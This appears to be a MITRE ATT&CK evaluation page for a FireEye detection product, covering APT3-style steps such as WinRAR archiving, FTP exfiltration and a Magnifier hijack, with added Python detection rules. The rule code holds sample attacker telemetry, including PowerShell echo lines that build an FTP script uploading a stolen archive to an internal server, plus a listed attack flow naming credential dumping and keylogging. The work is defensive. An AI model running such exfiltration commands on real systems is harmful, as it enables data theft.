Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified the attacker placing the WinRAR utility on the system as recycler.exe. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showing MD5 hash of recycler.exe
Parent alert for PowerShell File Write showing tainting of recycler.exe telemetry
Excerpt from the Managed Defense Report of the attacker placing the WinRAR utility on the system as recycler.exe (Specific Behavior)
Remote File Copy
(T1105)
Enrichment
  
The capability enriched powershell.exe writing recycler.exe with an alert for PowerShell File Write (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1105 - Remote File Copy) and Tactics (Command and Control, Lateral Movement).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker placed recycler.exe on the system. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of powershell.exe writing recycler.exe with PowerShell File Write alert (tagged with correct ATT&CK Technique, T1105 - Remote File Copy and Tactics, Command and Control, Lateral Movement)
Continued enrichment of powershell.exe writing recycler.exe with PowerShell File Write alert
Excerpt from the Managed Defense Report indicating the attacker placed recycler.exe on the system (Specific Behavior)
19.B.1
Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file
Data Compressed
(T1002)
General Behavior
  
A General Behavior alert was generated for Execution from Suspicious Directory (Weak Signal). The alert detected processes running from uncommon locations, and included recycler.exe executing with full command-line arguments, including the use of the -hp flag to encrypt and compress data.
Enrichment
  
The capability enriched the command line containing -hp with an alert for Possible Encrypted RAR Archive Command (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1002 - Data Compressed).
Enrichment
  
The capability enriched the file write of RAR with an alert for Rar Archive Created (Weak Signal) based on the header values of the file. The alert was also tagged with the correct ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration).
General Behavior
  
A General Behavior alert called File Write To Root Of Recycle Bin (Weak Signal) was generated for old.rar being written to the root of the Recycle Bin. The alert noted that all legitimate files should be written to a subfolder of the Recycle Bin.
Enrichment
  
The capability enriched the file write of RAR with a second alert for Rar Archive Created (Weak Signal) based on the header values of the file. The alert was also tagged with the correct ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker executed recycler.exe to create an encrypted RAR file, old.rar. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
General Behavior alert for Execution from Suspicious Directory
Enrichment of -hp command line with Possible Encrypted RAR Archive Command alert (tagged with correct ATT&CK Technique, T1002 - Data Compressed)
Enrichment of RAR file write with RAR Archive Created alert (tagged with correct ATT&CK Technique, T1002 - Data Compressed, and Tactic, Exfiltration)
General Behavior alert for File Write To Root Of Recycle Bin
Enrichment of RAR file write with RAR Archive Created alert (tagged with correct ATT&CK Technique, T1002 - Data Compressed, and Tactic, Exfiltration)
Excerpt from the Managed Defense Report indicating the attacker executed recycler.exe to create an encrypted RAR file (Specific Behavior)
Data Encrypted
(T1022)
General Behavior
  
A General Behavior alert was generated for Execution from Suspicious Directory (Weak Signal). The alert detected processes running from uncommon locations, and included recycler.exe executing with full command-line arguments, including the use of the -hp flag to encrypt and compress data.
Enrichment
  
The capability enriched an alert for Possible Encrypted RAR Archive Command (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1022 - Data Encrypted).
Enrichment
  
The capability enriched the file write of RAR with an alert for Rar Archive Created (Weak Signal) based on the header values of the file. The alert was also tagged with a related ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration).
General Behavior
  
A General Behavior alert called File Write To Root Of Recycle Bin (Weak Signal) was generated for old.rar being written to the root of the Recycle Bin. The alert noted that all legitimate files should be written to a subfolder of the Recycle Bin.
Enrichment
  
The capability enriched recycler.exe writing old.rar to the root of the Recycle Bin with an alert for Rar Archive Created (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it observed recycler.exe creating an encrypted RAR archive. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
General Behavior alert for Execution from Suspicious Directory
Enrichment of -hp command line with Possible Encrypted RAR Archive Command alert (tagged with correct ATT&CK Technique, T1022 - Data Encrypted)
Enrichment of RAR file write with RAR Archive Created alert (tagged with a related ATT&CK Technique, T1002 - Data Compressed, and Tactic, Exfiltration)
General Behavior alert for File Write To Root Of Recycle Bin
Enrichment of RAR file write with RAR Archive Created alert (tagged with a related ATT&CK Technique, T1002 - Data Compressed, and Tactic, Exfiltration)
Excerpt from the Managed Defense Report indicating the attacker executed recycler.exe to create an encrypted RAR file (Specific Behavior)
Masquerading
(T1036)
General Behavior
  
A General Behavior alert was generated for Execution from Suspicious Directory (Weak Signal). The alert detected processes running from uncommon locations, and included recycler.exe executing with full command-line arguments, including the use of the -hp flag to encrypt and compress data.
Enrichment
  
The capability enriched an alert for Possible Encrypted RAR Archive Command (Weak Signal). The alert was also tagged with related ATT&CK Techniques (T1022 - Data Encrypted and T1002 - Data Compressed).
Enrichment
  
The capability enriched the file write of RAR with an alert for Rar Archive Created (Weak Signal) based on the header values of the file. The alert was also tagged with a related ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration).
General Behavior
  
A General Behavior alert called File Write To Root Of Recycle Bin (Weak Signal) was generated for old.rar being written to the root of the Recycle Bin. The alert noted that all legitimate files should be written to a subfolder of the Recycle Bin.
Enrichment
  
The capability enriched recycler.exe writing old.rar to the root of the Recycle Bin with an alert for Rar Archive Created (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1002 - Data Compressed) and Tactic (Exfiltration).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it observed recycler.exe creating an encrypted RAR archive. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
General Behavior alert for Execution from Suspicious Directory
Enrichment of -hp command line with Possible Encrypted RAR Archive Command alert (tagged with related ATT&CK Techniques, T1022 - Data Encrypted and T1002 - Data Compressed)
Enrichment of RAR file write with RAR Archive Created alert (tagged with a related ATT&CK Technique, T1002 - Data Compressed, and Tactic, Exfiltration)
General Behavior alert for File Write To Root Of Recycle Bin
Enrichment of RAR file write with RAR Archive Created alert (tagged with a related ATT&CK Technique, T1002 - Data Compressed, and Tactic, Exfiltration)
Excerpt from the Managed Defense Report indicating the attacker executed recycler.exe to create an encrypted RAR file (Specific Behavior)
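The four weak signals raised for step 19.B.1 (execution from an uncommon directory, a RAR command line carrying -hp, a RAR header written to disk regardless of the file's name, and a file landing in the root of the Recycle Bin) can be expressed as small rules over process-create and file-write telemetry. The block below is an added example and is not FireEye's code or anything captured during the evaluation: the two events, the password and the archive bytes are constructed, the alert names mirror the page, and the technique IDs are the ATT&CK v6 identifiers the page uses (T1002 and T1022 were later folded into T1560, Archive Collected Data).

```python
import re
from typing import List, Optional

# Constructed telemetry for step 19.B.1: a renamed WinRAR binary (recycler.exe) run from the
# root of the Recycle Bin, writing an encrypted archive there. The password and the archive
# bytes are illustrative; only the shape of the events follows the evaluation.
PROCESS_EVENT = {
    "image": r"C:\$Recycle.Bin\recycler.exe",
    "command_line": r"C:\$Recycle.Bin\recycler.exe a -hpSecret123 old.rar Shockwave_network.vsdx",
}
FILE_EVENT = {
    "path": r"C:\$Recycle.Bin\old.rar",
    "writer": r"C:\$Recycle.Bin\recycler.exe",
    "header": b"Rar!\x1a\x07\x01\x00" + b"\x33\x92\xb5\xe5",  # RAR5 signature, then archive data
}

# Directories that interactive tooling rarely runs from legitimately.
SUSPICIOUS_DIRS = re.compile(r"""
    ^[a-z]:\\(
        \$recycle\.bin
      | users\\public
      | programdata
      | perflogs
      | windows\\(temp|tasks)
      | users\\[^\\]+\\appdata\\local\\temp
    )\\
""", re.IGNORECASE | re.VERBOSE)
# A file directly under <drive>:\$Recycle.Bin. Explorer only ever writes deleted files
# ($R... payload and $I... metadata) into the per-user <SID> subfolders below it.
RECYCLE_BIN_ROOT = re.compile(r"^[a-z]:\\\$recycle\.bin\\[^\\]+$", re.IGNORECASE)
RAR4_MAGIC = b"Rar!\x1a\x07\x00"
RAR5_MAGIC = b"Rar!\x1a\x07\x01\x00"


def execution_from_suspicious_directory(image: str) -> bool:
    """True when the image sits in a directory users do not normally launch programs from."""
    return SUSPICIOUS_DIRS.search(image) is not None


def rar_encryption_switch(command_line: str) -> Optional[str]:
    """'headers+data' for -hp, 'data' for -p, None when no RAR password switch is present.

    WinRAR's -hp encrypts file names and headers as well as contents; -p encrypts contents only,
    so a -hp archive hides even what was taken. Only the 'a' (add) command creates archives.
    """
    tokens = command_line.split()
    if len(tokens) < 2 or tokens[1].lower() != "a":
        return None
    for tok in tokens[2:]:
        low = tok.lower()
        if low.startswith("-hp"):
            return "headers+data"
        if low.startswith("-p") and low != "-p-":  # -p- explicitly disables the password
            return "data"
    return None


def rar_signature(header: bytes) -> Optional[str]:
    """Identify a RAR archive from its leading bytes, whatever extension the file carries."""
    if header.startswith(RAR5_MAGIC):
        return "rar5"
    if header.startswith(RAR4_MAGIC):
        return "rar4"
    return None


def written_to_recycle_bin_root(path: str) -> bool:
    """True when a file lands directly in $Recycle.Bin rather than in a <SID> subfolder."""
    return RECYCLE_BIN_ROOT.match(path) is not None


def evaluate(process_event: dict, file_event: dict) -> List[dict]:
    """Emit the weak-signal alerts a rules engine would raise for these two events."""
    alerts = []
    if execution_from_suspicious_directory(process_event["image"]):
        alerts.append({"name": "Execution from Suspicious Directory", "attack": []})
    mode = rar_encryption_switch(process_event["command_line"])
    if mode:
        alerts.append({"name": "Possible Encrypted RAR Archive Command",
                       "attack": ["T1022", "T1002"], "encryption": mode})
    kind = rar_signature(file_event["header"])
    if kind:
        alerts.append({"name": "Rar Archive Created", "attack": ["T1002"], "format": kind})
    if written_to_recycle_bin_root(file_event["path"]):
        alerts.append({"name": "File Write To Root Of Recycle Bin", "attack": []})
    return alerts


if __name__ == "__main__":
    for alert in evaluate(PROCESS_EVENT, FILE_EVENT):
        print(alert)
```

The header check is what makes the masquerading detection hold up: renaming rar.exe to recycler.exe and the archive to something other than .rar changes nothing about the bytes written, so the file-write rule keys on the magic value rather than on names. The Recycle Bin rule is equally cheap, because the only legitimate writer of that tree places files under a SID subfolder.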
19.C.1
Empire: Sequence of 'echo' commands via PowerShell to populate commands in text file (ftp.txt), which is then executed by FTP to exfil data through network connection separate of existing C2 channel
Exfiltration Over Alternative Protocol
(T1048)
Enrichment
  
The capability enriched ftp.exe execution with an alert for FTP Utility Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Software (S0095 - FTP).
Enrichment
  
The capability enriched ftp.exe executing with the -s argument (which runs the commands in a script file, here ftp.txt) with a separate alert for FTP Utility Execution (Weak Signal).
Enrichment
  
The capability enriched a TCP port 21 connection to 192.168.0.4 (C2 server) with an alert for FTP Network Connection (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1048 - Exfiltration Over Alternative Protocol) and Tactic (Exfiltration).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it observed the ftp commands being written to ftp.txt and the subsequent execution of ftp.exe with the file. The old.rar file was seen uploaded to 192.168.0.4 (C2 server). Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of ftp.exe executing the ftp.txt file with FTP Utility Execution alert (tagged with the correct ATT&CK Software, S0095 - FTP)
Enrichment of ftp.exe run with the -s argument (executing the commands in ftp.txt) with a separate FTP Utility Execution alert
Enrichment of TCP port 21 connection to 192.168.0.4 (C2 server) with FTP Network Connection alert (tagged with correct ATT&CK Technique, T1048 - Exfiltration Over Alternative Protocol, and Tactic, Exfiltration)
Excerpt from the Managed Defense Report showing the writing of FTP commands to ftp.txt and the subsequent execution of the ftp.txt file (Specific Behavior)
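The enrichments for 19.C.1 key on three things visible in telemetry: ftp.exe running at all, ftp.exe running with -s: (non-interactive execution of a script file), and ftp.exe opening TCP/21. What the Managed Defense Report adds is the join between those and the PowerShell 'echo' redirections that built ftp.txt, which names the server and the uploaded file. The block below is an added example in Python, not FireEye's code or the evaluation's data: the event stream, PIDs, credentials and echo lines are constructed, the alert names follow the page, and "Scripted FTP Upload" is a hypothetical correlated alert added here to show the script being rebuilt from the echo commands.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed event stream for step 19.C.1. Credentials, PIDs and the echo lines are
# illustrative; the shape follows the evaluation: PowerShell 'echo' redirections build
# ftp.txt, ftp.exe is run with -s:ftp.txt, and ftp.exe opens TCP/21 to the server.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
FTP = r"C:\Windows\System32\ftp.exe"
EVENTS = [
    {"type": "process", "pid": 4120, "image": PS, "command_line": 'powershell -c "echo open 192.168.0.4 > ftp.txt"'},
    {"type": "process", "pid": 4121, "image": PS, "command_line": 'powershell -c "echo user ftpuser ftppass >> ftp.txt"'},
    {"type": "process", "pid": 4122, "image": PS, "command_line": 'powershell -c "echo binary >> ftp.txt"'},
    {"type": "process", "pid": 4123, "image": PS, "command_line": r'powershell -c "echo put C:\$Recycle.Bin\old.rar >> ftp.txt"'},
    {"type": "process", "pid": 4124, "image": PS, "command_line": 'powershell -c "echo bye >> ftp.txt"'},
    {"type": "process", "pid": 4130, "image": FTP, "command_line": "ftp -s:ftp.txt"},
    {"type": "network", "pid": 4130, "image": FTP, "proto": "tcp", "dst_ip": "192.168.0.4", "dst_port": 21},
]

# echo <text> > file  or  echo <text> >> file ; the file token stops at whitespace or a quote.
ECHO_REDIRECT = re.compile(r'''echo\s+(?P<text>.+?)\s*(?P<op>>{1,2})\s*(?P<file>[^\s"']+)''', re.IGNORECASE)
# ftp.exe's -s:<file> switch runs the commands in <file> instead of reading them from the console.
FTP_SCRIPT_SWITCH = re.compile(r"(?:^|\s)-s:(?P<file>\S+)", re.IGNORECASE)


def echo_redirect(command_line: str) -> Optional[Tuple[str, str, bool]]:
    """Parse an echo redirection; returns (file, text, append) or None when there is none."""
    m = ECHO_REDIRECT.search(command_line)
    if not m:
        return None
    return m.group("file").lower(), m.group("text").strip(), m.group("op") == ">>"


def reconstruct_scripts(events: List[dict]) -> Dict[str, List[str]]:
    """Rebuild, line by line, every file populated through echo redirections."""
    files: Dict[str, List[str]] = {}
    for ev in events:
        if ev["type"] != "process":
            continue
        parsed = echo_redirect(ev["command_line"])
        if not parsed:
            continue
        name, text, append = parsed
        if not append:
            files[name] = []  # a single '>' truncates, so the file starts over
        files.setdefault(name, []).append(text)
    return files


def ftp_script_path(command_line: str) -> Optional[str]:
    """Return the script handed to ftp.exe via -s:, or None for interactive use."""
    m = FTP_SCRIPT_SWITCH.search(command_line)
    return m.group("file").lower() if m else None


def summarize_ftp_script(lines: List[str]) -> dict:
    """Pull the server and the uploaded paths out of an ftp.exe command script."""
    host, uploads = None, []
    for line in lines:
        m = re.match(r"open\s+(\S+)", line, re.IGNORECASE)
        if m:
            host = m.group(1)
        m = re.match(r"(?:put|mput|send)\s+(.+)", line, re.IGNORECASE)
        if m:
            uploads.append(m.group(1).strip())
    return {"host": host, "uploads": uploads}


def analyze(events: List[dict]) -> List[dict]:
    """Raise the ftp.exe enrichments and correlate the -s: script with the echo-built file."""
    alerts = []
    scripts = reconstruct_scripts(events)
    for ev in events:
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        if ev["type"] == "process" and image == "ftp.exe":
            alerts.append({"name": "FTP Utility Execution", "attack": ["S0095"], "pid": ev["pid"]})
            script = ftp_script_path(ev["command_line"])
            if script:
                alerts.append({"name": "FTP Utility Execution", "attack": ["S0095"], "pid": ev["pid"], "script": script})
                if script in scripts:  # hypothetical correlated alert, not a FireEye alert name
                    alerts.append({"name": "Scripted FTP Upload", "attack": ["T1048"], "pid": ev["pid"],
                                   **summarize_ftp_script(scripts[script])})
        if ev["type"] == "network" and image == "ftp.exe" and ev["proto"] == "tcp" and ev["dst_port"] == 21:
            alerts.append({"name": "FTP Network Connection", "attack": ["T1048"], "pid": ev["pid"],
                           "dst": f'{ev["dst_ip"]}:{ev["dst_port"]}'})
    return alerts


if __name__ == "__main__":
    for alert in analyze(EVENTS):
        print(alert)
```

The reconstruction honours the difference between '>' and '>>', since an operator who restarts the file with a single '>' would otherwise leave stale lines in the rebuilt script. Matching the script by name is deliberately loose; in real telemetry the echo redirections and the -s: argument may use different relative paths, and the join should then be done on the resolved path from the process's working directory.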
19.D.1
Empire: 'del C:\"$"Recycle.bin\old.rar'
File Deletion
(T1107)
None
  
No detection capability demonstrated for this procedure.
19.D.2
Empire: 'del recycler.exe'
File Deletion
(T1107)
None
  
No detection capability demonstrated for this procedure.
20.A.1
magnify.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)
Accessibility Features
(T1015)
General Behavior
  
A General Behavior alert was generated for RENAMED CMD.EXE, with a description explaining how attackers will sometimes rename cmd.exe to other filenames to try to bypass detections.
Specific Behavior
  
A Specific Behavior alert was generated for Accessibility Features Child Process due to whoami.exe spawning from magnify.exe. The alert was also tagged with the correct ATT&CK Technique (T1015 - Accessibility Features) and Tactics (Persistence, Privilege Escalation).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker replaced the Magnifier accessibility feature (magnify.exe) to launch a privileged command shell. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
General Behavior alert for RENAMED CMD.EXE
Continued details for General Behavior alert for RENAMED CMD.EXE
Specific Behavior alert for Accessibility Features Child Process due to magnify.exe spawning whoami.exe (tagged with the correct ATT&CK Technique, T1015 - Accessibility Features, and Tactics, Persistence, Privilege Escalation)
Excerpt from the Managed Defense Report indicating the attacker replaced the Magnifier accessibility feature (magnify.exe) to launch a privileged command shell (Specific Behavior)
Remote Desktop Protocol
(T1076)
Enrichment
  
The capability enriched a TCP port 3389 connection with an alert for RDP Network Connection (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1076 - Remote Desktop Protocol) and Tactic (Lateral Movement).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified the use of the Remote Desktop Protocol to connect to Creeper. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of TCP port 3389 connection with RDP Network Connection alert (tagged with correct ATT&CK Technique, T1076 - Remote Desktop Protocol, and Tactic, Lateral Movement)
Excerpt from the Managed Defense Report indicating Remote Desktop Protocol was used to connect to Creeper (Specific Behavior)
20.B.1
Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)
System Owner / User Discovery
(T1033)
Telemetry (Tainted)
  
 
Telemetry showed whoami.exe executing from magnify.exe within an alert for Accessibility Features Child Process. The telemetry was tainted by the Accessibility Features Child Process (METHODOLOGY) alert.
Enrichment
  
The capability enriched whoami.exe with an alert for Whoami Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1033 - System Owner/User Discovery) and Tactic (Discovery).
Telemetry showing whoami.exe executing as a child process of magnify.exe (tainted by parent Accessibility Features Child Process alert)
Enrichment of whoami.exe with Whoami Execution alert (tagged with correct ATT&CK Technique, T1033 - System Owner/User Discovery, and Tactic, Discovery)
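Steps 20.A.1 and 20.B.1 together show how an accessibility-feature hijack surfaces in process telemetry: a file named magnify.exe whose PE version resource still says it is cmd.exe (the RENAMED CMD.EXE signal), an Ease of Access binary started by winlogon.exe as SYSTEM from the logon screen, a child process under that binary (Accessibility Features Child Process), and the whoami.exe enrichment whose telemetry is tainted by the alerts already raised on its parent. The block below is an added example in Python, not FireEye's code or the evaluation's data: the Sysmon-style events and PIDs are constructed, the OriginalFileName field is what Sysmon Event ID 1 reports from the PE version resource, "Accessibility Feature Launched By Winlogon" is a hypothetical alert name, and the technique IDs are the ATT&CK v6 ones used on this page (T1015 is now T1546.008).

```python
from typing import Dict, List, Optional

# Constructed process-create telemetry (Sysmon Event ID 1 style, including the PE version
# resource's OriginalFileName) for steps 20.A.1 and 20.B.1. PIDs are illustrative.
SYSTEM = r"NT AUTHORITY\SYSTEM"
EVENTS = [
    {"pid": 700, "ppid": 480, "image": r"C:\Windows\System32\winlogon.exe", "original_file_name": "WINLOGON.EXE",
     "parent_image": r"C:\Windows\System32\smss.exe", "user": SYSTEM, "command_line": "winlogon.exe"},
    # cmd.exe copied over magnify.exe: the on-disk name changed, the version resource did not.
    {"pid": 3310, "ppid": 700, "image": r"C:\Windows\System32\magnify.exe", "original_file_name": "Cmd.Exe",
     "parent_image": r"C:\Windows\System32\winlogon.exe", "user": SYSTEM, "command_line": "magnify.exe"},
    {"pid": 3322, "ppid": 3310, "image": r"C:\Windows\System32\whoami.exe", "original_file_name": "whoami.exe",
     "parent_image": r"C:\Windows\System32\magnify.exe", "user": SYSTEM, "command_line": "whoami"},
]

# Ease of Access binaries winlogon.exe will launch from the logon screen, before any user logs on.
ACCESSIBILITY = {"sethc.exe", "utilman.exe", "osk.exe", "magnify.exe", "narrator.exe", "displayswitch.exe", "atbroker.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
RECON = {"whoami.exe": "T1033"}  # discovery utilities worth an enrichment alert on their own


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def renamed_binary(ev: dict) -> Optional[str]:
    """The PE's own name when a shell has been saved under a different file name, else None."""
    original = ev["original_file_name"].lower()
    if original in SHELLS and original != basename(ev["image"]):
        return original
    return None


def logon_screen_launch(ev: dict) -> bool:
    """An accessibility binary started by winlogon.exe as SYSTEM, i.e. from the logon screen
    (locally or over RDP). That is the path that turns the hijack into a SYSTEM shell."""
    return (basename(ev["image"]) in ACCESSIBILITY
            and basename(ev["parent_image"]) == "winlogon.exe"
            and ev["user"].lower() == SYSTEM.lower())


def accessibility_child(ev: dict) -> bool:
    """True when an Ease of Access binary spawns a child; the genuine tools rarely do."""
    return basename(ev["parent_image"]) in ACCESSIBILITY


def analyze(events: List[dict]) -> List[dict]:
    """Run the rules in order. Each event yields one telemetry record, marked tainted when a
    parent already alerted, followed by any alerts raised on the event itself."""
    alerted: Dict[int, str] = {}  # pid -> first alert raised on that process
    records = []
    for ev in events:
        name = basename(ev["image"])
        records.append({"pid": ev["pid"], "kind": "telemetry", "image": name,
                        "parent": basename(ev["parent_image"]), "tainted_by": alerted.get(ev["ppid"])})
        hits = []
        original = renamed_binary(ev)
        if original:
            hits.append(("RENAMED " + original.upper(), []))
        if logon_screen_launch(ev):
            hits.append(("Accessibility Feature Launched By Winlogon", ["T1015"]))  # hypothetical name
        if accessibility_child(ev):
            hits.append(("Accessibility Features Child Process", ["T1015"]))
        if name in RECON:
            hits.append((name[:-4].capitalize() + " Execution", [RECON[name]]))
        for alert, attack in hits:
            records.append({"pid": ev["pid"], "kind": "alert", "name": alert, "attack": attack})
            alerted.setdefault(ev["pid"], alert)
    return records


if __name__ == "__main__":
    for rec in analyze(EVENTS):
        print(rec)
```

The OriginalFileName comparison is the cheapest renamed-binary check available from telemetry alone and needs no hash database, but it only catches copies of Microsoft-signed tools that keep their version resource; an attacker who patches the resource or drops a third-party shell defeats it, which is why the parent/child rules stand on their own. The taint bookkeeping is what the legend's "Tainted" modifier describes: the whoami.exe record is plain telemetry, but it is reachable only because the alerts on its parent already pointed an analyst at that process tree.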

Operational Flow

The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.

Step 1: Initial Compromise

1.A.1 Execution

User Execution, Rundll32, Scripting

i. Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)

1.B.1 Persistence

Registry Run Keys / Startup Folder

i. Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder

1.C.1 Command and Control

Commonly Used Port, Data Encoding, Standard Application Layer Protocol

i. Cobalt Strike: C2 channel established

Step 2: Initial Discovery

2.A.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'ipconfig /all' via cmd

2.A.2 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'arp -a' via cmd

2.B.1 Discovery

System Owner / User Discovery

i. Cobalt Strike: 'echo' via cmd to enumerate specific environment variables

2.C.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

2.C.2 Discovery

Process Discovery

i. Cobalt Strike: 'tasklist /v' via cmd

2.D.1 Discovery

System Service Discovery

i. Cobalt Strike: 'sc query' via cmd

2.D.2 Discovery

System Service Discovery

i. Cobalt Strike: 'net start' via cmd

2.E.1 Discovery

System Information Discovery

i. Cobalt Strike: 'systeminfo' via cmd

2.E.2 Discovery

System Information Discovery

i. Cobalt Strike: 'net config workstation' via cmd

2.F.1 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators' via cmd

2.F.2 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net localgroup administrators /domain' via cmd

2.F.3 Discovery

Permission Groups Discovery

i. Cobalt Strike: 'net group "Domain Admins" /domain' via cmd

2.G.1 Discovery

Account Discovery

i. Cobalt Strike: 'net user /domain' via cmd

2.G.2 Discovery

Account Discovery

i. Cobalt Strike: 'net user george /domain' via cmd

2.H.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key

Step 3: Privilege Escalation

3.A.1 Defense Evasion, Privilege Escalation

Access Token Manipulation, Bypass User Account Control

i. Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level

3.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

3.C.1 Defense Evasion, Privilege Escalation

Process Injection

i. Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe

Step 4: Discovery for Lateral Movement

4.A.1 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Controllers" /domain' via cmd

4.A.2 Discovery

Remote System Discovery

i. Cobalt Strike: 'net group "Domain Computers" /domain' via cmd

4.B.1 Discovery

System Network Configuration Discovery

i. Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd

4.C.1 Discovery

System Network Connections Discovery

i. Cobalt Strike: 'netstat -ano' via cmd

Step 5: Credential Access

5.A.1 Credential Access

Credential Dumping, Process Injection

i. Cobalt Strike: Built-in Mimikatz credential dump capability executed

5.A.2 Credential Access

Credential Dumping, Process Injection

i. Cobalt Strike: Built-in hash dump capability executed

5.B.1 Defense Evasion, Privilege Escalation

Access Token Manipulation

i. Cobalt Strike: Built-in token theft capability executed to change user context to George

Step 6: Lateral Movement

6.A.1 Discovery

Query Registry

i. Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)

6.B.1 Command and Control

Commonly Used Port, Multiband Communication, Standard Application Layer Protocol

i. Cobalt Strike: C2 channel modified

6.C.1 Lateral Movement

Remote Desktop Protocol

i. Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)

Step 7: Persistence

7.A.1 Persistence

Create Account, Graphical User Interface, Account Discovery

i. Added user Jesse to Conficker (10.0.0.5) through RDP connection

7.B.1 Command and Control, Lateral Movement

Remote File Copy

i. Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)

7.C.1 Execution, Persistence, Privilege Escalation

Scheduled Task

i. Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)

Step 8: Collection

8.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'dir /s /b "\\conficker\wormshare"' via cmd

8.A.2 Discovery

File and Directory Discovery

i. Cobalt Strike: 'tree "C:\Users\debbie"' via cmd

8.B.1 Discovery

Process Discovery

i. Cobalt Strike: 'ps' (Process status) via Win32 APIs

8.C.1 Collection, Credential Access

Input Capture, Application Window Discovery

i. Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie

8.D.1 Collection

Screen Capture, Process Injection

i. Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie

Step 9: Exfiltration

9.A.1 Discovery

File and Directory Discovery

i. Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

9.B.1 Collection

Data from Network Shared Drive, Exfiltration Over Command and Control Channel

i. Cobalt Strike: Built-in download capability executed to collect a file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)

Step 10: Execution of Persistence

10.A.1 Persistence

Registry Run Keys / Startup Folder

i. Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32

10.A.2 Execution, Persistence, Privilege Escalation

Scheduled Task

i. Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32

10.B.1 Lateral Movement

Remote Desktop Protocol, Valid Accounts

i. RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse

Step 11: Initial Access

11.A.1 Defense Evasion, Execution

Scripting

i. Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)

11.B.1 Command and Control

